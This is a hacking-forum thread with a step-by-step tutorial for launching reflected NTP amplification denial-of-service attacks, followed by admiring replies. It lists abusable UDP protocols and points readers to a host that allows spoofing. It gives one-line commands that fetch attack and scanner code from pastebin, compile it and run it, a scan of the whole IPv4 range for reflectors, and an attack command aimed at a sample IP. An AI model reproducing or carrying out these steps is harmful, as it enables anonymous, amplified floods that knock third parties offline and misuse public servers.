ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!
Home
Upgrade
Credits
Help
Search
Awards
Achievements
 22618

[TUTORIAL] DrDoS

by LucasYegorov - 10-10-2016 - 05:35 AM
#1
DrDoS

1.0 Introduction to DrDoS
Distributed Reflection Denial of Service, also known as DrDoS has been used for years to create some of the world's largest DDoS attacks! Over the past 5-6 years it has gotten so easy that now anyone can do it with just $10 and some simple knowledge of the Linux OS. Many people use DrDoS in combination with botnets, controlling mass quantities of bots that are able to launch a reflected attack can be overpowering to some. DrDoS is often used in DDoS for Hire sites.

Reflection takes advantage of UDP services. UDP, by design, is a connectionless internet protocol in which the reciever does not fully validate the IPv4 address of the source. This lack of validation makes it possible for someone to pretent to be you! Since it seems like the packets are coming from the target's IP, typically it will send all requests back said IP. This serves 2 purposes of the attack, attack can hide his identity and amplify the attacks greatly.
1.1 Types of Amplification Vectors
In the past there was only DNS amplification, until people started experimenting with other UDP based protocols. Each protocol has a different Bandwidth Amplification Factor, meaning one method might amplify.
100Mbps -> 5000Mbps while another might give you this result: 100Mbps -> 1000Mbps
Here is but a short list of protocols you can abuse:
DNS
CHARGEN
NTP
SNMPv2
SSDP
Quote of the Day
Teamspeak 3
Quake Network Protocol
BitTorrent
NetBIOS
MSSQL
PORTMAP
RIP
2.0 Launching a DrDoS Attack
This tutorial is focused around the NTP attack vector.
[Image: Abusing+Network+Time+Protocol+(NTP)+to+p...attack.jpg]

Here is what you will need for this
  • Common Sense
  • Spoofed Dedicated Server with Ubuntu 14.04 64bit Installed
  • Server for reflector scanning
Here is a host that allows IP Header Modification (Spoofing):
Hidden Content
You must register or login to view this content.





1.) First you need to setup your attacking server. You can login using a SSH client called PuTTy.
[Image: bb874f939b38428bafad5e30cf8d2da4.png]

2.) You will need to install the dependencies for you to run the attack script
Code:
apt-get install gcc wget

3.) Now install the NTP Attack Script:
Code:
wget -q http://pastebin.com/raw/fcyCGWqw -O ntp.c; gcc -o ntp ntp.c -pthread; rm -rf ntp.c; ./ntp

4.) Here is where you login to your scanning server! And run these commands
Code:
apt-get install gcc wget -y; wget -q http://pastebin.com/raw/XWFfm5hh -O ntpscan.c; gcc -o ntpscan ntpscan.c -pthread; rm -rf ntpscan.c; ./ntpscan
Code:
Example for scanning: ./ntpscan 1.0.0.0 255.255.255.255 ntp.txt 3 5


Should look something like this:
[Image: 94f2696d150f40e0acb745ac95343ecc.png]
5.) Filtering your reflection lists:

You will often get multipe IPs in one list. Sorts out any duplicate IPs :
cat scanned.txt | sort -u > unique.txt

Sorts IPs over certain response size(ex: 300):
cat scannedlist.txt |awk '{if($2>300)print $1}' | sort -u > output.txt
6.) Now log back into your attacking server and upload your new filtered reflection list of NTP servers. And use this command 
to start an attack. Time is in seconds.

Code:
Usage: ./ntp [IP] [file] [threads] [limiter] [time]
Ex: ./ntp 75.14.61.198 ntp.txt 1 -1 300

7.) Here are some results of the successful amplification against another target:
[Image: 14af945bb98749e9a0e65765ddd1594e.png]
[Image: py063Fi.png]
Reply
#2
Very nice thread! :)
Reply
#3
Great tutorial, well written and in depth. Hopefully I can be a l33t hax0r now.
Reply
#4
(10-10-2016 - 05:45 AM)AFG Wrote: Very nice thread! :)

Thank you :)!

(10-10-2016 - 05:45 AM)Axe Wrote: Great tutorial, well written and in depth. Hopefully I can be a l33t hax0r now.

AnYoNe CaN HaKK tHe FuCkInG PlAnEt NoW
[Image: py063Fi.png]
Reply
#5
Great tutorial.
Reply
#6
Well constructed tutorial thank you OP Heart

Got me some reading to do :D
Reply
#7
Nice tutorial hax god. :yus:Heart
Jacked by Red @ https://pulses.xyz/
Reply
#8
This is actually a dope tutorial, thank you for sharing man. This will help a lot. Heart
Are you a guest to this site? Click the image below and sign up today!
[Image: FTYbRmR.gif]
Reply
#9
awesome documentry tenks bro
Reply
#10
the hoster frist herberg will suspended servers by outgoing ddos?
This account is currently banned
Ban reason: Multi Accounting.
Reply

Users browsing: 6 Guest(s)